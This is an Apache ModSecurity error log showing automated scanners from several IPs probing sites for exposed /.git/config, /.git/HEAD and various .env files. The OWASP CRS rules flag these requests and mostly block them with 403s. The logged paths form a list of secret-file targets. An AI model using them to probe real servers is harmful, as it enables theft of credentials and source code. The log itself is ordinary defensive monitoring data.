[Sun Jun 08 02:31:01.699733 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aETZxbUz9CVwWtZ9cYd_3QAAAAI"]
[Sun Jun 08 02:31:01.700011 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aETZxbUz9CVwWtZ9cYd_3QAAAAI"]
[Sun Jun 08 02:31:01.700185 2025] [:error] [pid 3709499] [client 34.162.135.152:33868] [client 34.162.135.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aETZxbUz9CVwWtZ9cYd_3QAAAAI"]
[Sun Jun 08 19:24:54.191420 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEXHZjksTRWbcnvSS5W59AAAAAE"]
[Sun Jun 08 19:24:54.191685 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEXHZjksTRWbcnvSS5W59AAAAAE"]
[Sun Jun 08 19:24:54.191851 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEXHZjksTRWbcnvSS5W59AAAAAE"]
[Sun Jun 08 19:24:54.300958 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEXHZjksTRWbcnvSS5W59QAAAAE"]
[Sun Jun 08 19:24:54.301188 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEXHZjksTRWbcnvSS5W59QAAAAE"]
[Sun Jun 08 19:24:54.303126 2025] [:error] [pid 3710073] [client 34.162.19.103:38472] [client 34.162.19.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEXHZjksTRWbcnvSS5W59QAAAAE"]
[Sun Jun 08 23:46:19.503356 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7gAAAAI"]
[Sun Jun 08 23:46:19.503671 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7gAAAAI"]
[Sun Jun 08 23:46:19.504579 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7gAAAAI"]
[Sun Jun 08 23:46:19.614018 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7wAAAAI"]
[Sun Jun 08 23:46:19.614261 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7wAAAAI"]
[Sun Jun 08 23:46:19.614434 2025] [:error] [pid 3710074] [client 34.162.109.166:33958] [client 34.162.109.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aEYEq1Cw3nQAPfQHBHaS7wAAAAI"]
[Mon Jun 09 04:24:21.408590 2025] [:error] [pid 3732065] [client 13.39.163.23:53162] [client 13.39.163.23] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEZF1dxe5_tbhjriGNwH-wAAAAg"]
[Mon Jun 09 04:24:21.408912 2025] [:error] [pid 3732065] [client 13.39.163.23:53162] [client 13.39.163.23] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEZF1dxe5_tbhjriGNwH-wAAAAg"]
[Mon Jun 09 04:24:21.409074 2025] [:error] [pid 3732065] [client 13.39.163.23:53162] [client 13.39.163.23] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEZF1dxe5_tbhjriGNwH-wAAAAg"]
[Mon Jun 09 14:24:15.115374 2025] [:error] [pid 3731772] [client 93.123.109.101:47514] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aEbSb62el8w1nhQcTQ-xAwAAAAM"]
[Mon Jun 09 14:24:15.115665 2025] [:error] [pid 3731772] [client 93.123.109.101:47514] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aEbSb62el8w1nhQcTQ-xAwAAAAM"]
[Mon Jun 09 14:24:15.115826 2025] [:error] [pid 3731772] [client 93.123.109.101:47514] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aEbSb62el8w1nhQcTQ-xAwAAAAM"]
[Mon Jun 09 14:24:15.248909 2025] [:error] [pid 3736065] [client 93.123.109.101:47520] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aEbSb0I1Q_tv-lG9CuB1TwAAAAs"]
[Mon Jun 09 14:24:15.249217 2025] [:error] [pid 3736065] [client 93.123.109.101:47520] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aEbSb0I1Q_tv-lG9CuB1TwAAAAs"]
[Mon Jun 09 14:24:15.249415 2025] [:error] [pid 3736065] [client 93.123.109.101:47520] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aEbSb0I1Q_tv-lG9CuB1TwAAAAs"]
[Mon Jun 09 14:24:15.382843 2025] [:error] [pid 3732066] [client 93.123.109.101:47526] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aEbSb_apOuZKkaf2c_kw5wAAAAk"]
[Mon Jun 09 14:24:15.383088 2025] [:error] [pid 3732066] [client 93.123.109.101:47526] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aEbSb_apOuZKkaf2c_kw5wAAAAk"]
[Mon Jun 09 14:24:15.383263 2025] [:error] [pid 3732066] [client 93.123.109.101:47526] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.prod"] [unique_id "aEbSb_apOuZKkaf2c_kw5wAAAAk"]
[Mon Jun 09 14:24:15.518303 2025] [:error] [pid 3735937] [client 93.123.109.101:47528] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aEbSbziJ7Vg3fzUphglodQAAAAo"]
[Mon Jun 09 14:24:15.518550 2025] [:error] [pid 3735937] [client 93.123.109.101:47528] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aEbSbziJ7Vg3fzUphglodQAAAAo"]
[Mon Jun 09 14:24:15.518730 2025] [:error] [pid 3735937] [client 93.123.109.101:47528] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aEbSbziJ7Vg3fzUphglodQAAAAo"]
[Mon Jun 09 14:24:15.648672 2025] [authz_core:error] [pid 3736064] [client 93.123.109.101:47542] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Mon Jun 09 14:24:15.762108 2025] [:error] [pid 3731785] [client 93.123.109.101:47558] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aEbSb-toC94NEVlW_u3TywAAAAU"]
[Mon Jun 09 14:24:15.762397 2025] [:error] [pid 3731785] [client 93.123.109.101:47558] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aEbSb-toC94NEVlW_u3TywAAAAU"]
[Mon Jun 09 14:24:15.762585 2025] [:error] [pid 3731785] [client 93.123.109.101:47558] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aEbSb-toC94NEVlW_u3TywAAAAU"]
[Mon Jun 09 14:24:16.552565 2025] [:error] [pid 3731772] [client 93.123.109.101:47610] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aEbScK2el8w1nhQcTQ-xBAAAAAM"]
[Mon Jun 09 14:24:16.552829 2025] [:error] [pid 3731772] [client 93.123.109.101:47610] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aEbScK2el8w1nhQcTQ-xBAAAAAM"]
[Mon Jun 09 14:24:16.553002 2025] [:error] [pid 3731772] [client 93.123.109.101:47610] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aEbScK2el8w1nhQcTQ-xBAAAAAM"]
[Mon Jun 09 14:24:16.640575 2025] [:error] [pid 3736065] [client 93.123.109.101:47612] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aEbScEI1Q_tv-lG9CuB1UAAAAAs"]
[Mon Jun 09 14:24:16.640828 2025] [:error] [pid 3736065] [client 93.123.109.101:47612] [client 93.123.109.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aEbScEI1Q_tv-lG9CuB1UAAAAAs"]
[Mon Jun 09 14:24:16.641038 2025] [:error] [pid 3736065] [client 93.123.109.101:47612] [client 93.123.109.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aEbScEI1Q_tv-lG9CuB1UAAAAAs"]
[Mon Jun 09 14:24:16.719040 2025] [:error] [pid 3732066] [client 93.123.109.101:47618] [client 93.123.109.101] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aEbScPapOuZKkaf2c_kw6AAAAAk"]
